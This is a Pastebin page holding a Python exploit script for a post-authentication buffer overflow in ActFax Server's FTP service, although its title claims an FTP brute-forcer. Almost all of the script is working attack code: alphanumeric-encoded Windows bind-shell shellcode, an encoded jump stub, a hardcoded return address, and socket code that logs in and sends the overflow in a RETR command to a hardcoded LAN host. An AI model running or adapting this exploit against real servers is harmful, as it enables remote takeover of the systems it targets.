API tools faq
paste
Advertisement
YeiZeta

FTPBRUTE_Phython Modificado Español

YeiZeta
Sep 5th, 2012
226
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.58 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2.  
  3. #-----------------------------------------------------------------------------------#
  4. # Exploit Title: ActFax Server FTP Remote BOF (post auth) #
  5. # Author: BreakSecurity #
  6. # Software Link: http://www.medianfire.es.tl #
  7. # Tested on: Windows XP PRO SP3 (version 2002) - VMware Workstation #
  8. #-----------------------------------------------------------------------------------#
  9. # ECHO POR MI MAMA. #
  10. # CiberSystem #
  11. #-----------------------------------------------------------------------------------#
  12.  
  13. import socket
  14. import sys
  15.  
  16. print "\nActFax XP SP3 Pro..."
  17. print "Hunting for alphanumeric code!!\n"
  18.  
  19. #-----------------------------------------------------------------------------------#
  20. # payload => win32_bind LPORT=9988 Size=709 => Encoder=PexAlphaNum #
  21. #-----------------------------------------------------------------------------------#
  22. shellcode = (
  23. "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
  24. "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
  25. "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
  26. "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
  27. "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
  28. "\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
  29. "\x4e\x56\x46\x32\x46\x52\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47"
  30. "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
  31. "\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x38"
  32. "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
  33. "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
  34. "\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x47\x45\x4e\x4b\x48"
  35. "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x44"
  36. "\x4b\x58\x4f\x55\x4e\x51\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x38"
  37. "\x49\x58\x4e\x56\x46\x42\x4e\x51\x41\x56\x43\x4c\x41\x33\x4b\x4d"
  38. "\x46\x46\x4b\x48\x43\x34\x42\x43\x4b\x48\x42\x44\x4e\x50\x4b\x38"
  39. "\x42\x47\x4e\x51\x4d\x4a\x4b\x38\x42\x54\x4a\x50\x50\x35\x4a\x56"
  40. "\x50\x38\x50\x54\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36"
  41. "\x43\x35\x48\x36\x4a\x56\x43\x33\x44\x33\x4a\x46\x47\x47\x43\x47"
  42. "\x44\x33\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
  43. "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e"
  44. "\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x50\x45\x35\x4c\x46\x44\x50"
  45. "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
  46. "\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x55\x43\x45\x43\x55\x43\x44"
  47. "\x43\x35\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x47\x52"
  48. "\x46\x30\x48\x36\x43\x55\x49\x38\x41\x4e\x45\x59\x4a\x36\x46\x4a"
  49. "\x4c\x51\x42\x57\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x31"
  50. "\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32"
  51. "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
  52. "\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x54\x47\x55\x4f\x4f\x48\x4d"
  53. "\x42\x35\x46\x55\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
  54. "\x47\x4e\x49\x47\x48\x4c\x49\x57\x47\x45\x4f\x4f\x48\x4d\x45\x55"
  55. "\x4f\x4f\x42\x4d\x48\x36\x4c\x56\x46\x46\x48\x36\x4a\x46\x43\x46"
  56. "\x4d\x56\x49\x38\x45\x4e\x4c\x46\x42\x45\x49\x35\x49\x42\x4e\x4c"
  57. "\x49\x58\x47\x4e\x4c\x46\x46\x44\x49\x38\x44\x4e\x41\x53\x42\x4c"
  58. "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x44\x4e\x32"
  59. "\x43\x59\x4d\x58\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
  60. "\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x44\x4f\x4f"
  61. "\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x55\x41\x45\x41\x35\x4c\x56"
  62. "\x41\x30\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36"
  63. "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56"
  64. "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
  65. "\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
  66. "\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x55\x43\x35\x4f\x4f\x48\x4d"
  67. "\x4f\x4f\x42\x4d\x5a")
  68.  
  69. #-----------------------------------------------------------------------------------#
  70. # ASCII encoded => Size=52 #
  71. # Decoded opcode => E9DE140000 - JMP 0178D7A7 #
  72. #-----------------------------------------------------------------------------------#
  73. farjump = (
  74. "\x25\x4A\x4D\x4E\x55" # AND EAX,554E4D4A
  75. "\x25\x35\x32\x31\x2A" # AND EAX,2A313235
  76. "\x2D\x55\x55\x55\x5A" # SUB EAX,5A555555
  77. "\x2D\x55\x55\x55\x5A" # SUB EAX,5A555555
  78. "\x2D\x56\x55\x55\x5B" # SUB EAX,5B555556
  79. "\x50" # PUSH EAX
  80. "\x25\x4A\x4D\x4E\x55" # AND EAX,554E4D4A
  81. "\x25\x35\x32\x31\x2A" # AND EAX,2A313235
  82. "\x2D\x5D\x60\x4E\x55" # SUB EAX,554E605D
  83. "\x2D\x5D\x60\x4E\x55" # SUB EAX,554E605D
  84. "\x2D\x5D\x60\x4E\x55" # SUB EAX,554E605D
  85. "\x50" # PUSH EAX
  86. "\xEB\xC1") # JMP SHORT 0112CAE0 (back to the beginning of ESP,
  87. # ESP now points to our decoded far-jump).
  88.  
  89. # ------------------------------------------------- ---------------------------------------------------#
  90. # #
  91. # A la hora del accidente nuestro buffer se copia varias veces en la memoria (algunos de estos son #
  92. # Corrupto), por lo que escribir algo de fantasía de gran salto instrucción en ESP. Después de esto es #
  93. # Descifrado de la memoria nos lanzamos a nuestros bytes nop (creo itteration 3de de nuestro buffer). #
  94. # Irónicamente esto ni siquiera hacer que el programa, sólo cuando se cierra el lazo #
  95. # Conexión shell hace la caída del programa ... #
  96. # #
  97. # Jmp esp - user32.dll => 0x7E429353 #
  98. # ------------------------------------------------- ---------------------------------------------------#
  99. buffer = "\x90"*41 + shellcode + "\x90"*23 + "\x53\x93\x42\x7E" + "\x90"*1 + farjump + "\x90"*175
  100.  
  101. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  102. connect=s.connect(('192.168.1.71',21))
  103. s.recv(1024)
  104. s.send('USER ' + 'b33f\r\n')
  105. print (s.recv(1024))
  106. s.send('PASS b33f\r\n')
  107. print (s.recv(1024))
  108. s.send('RETR ' + buffer + '\r\n')
  109. s.close
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!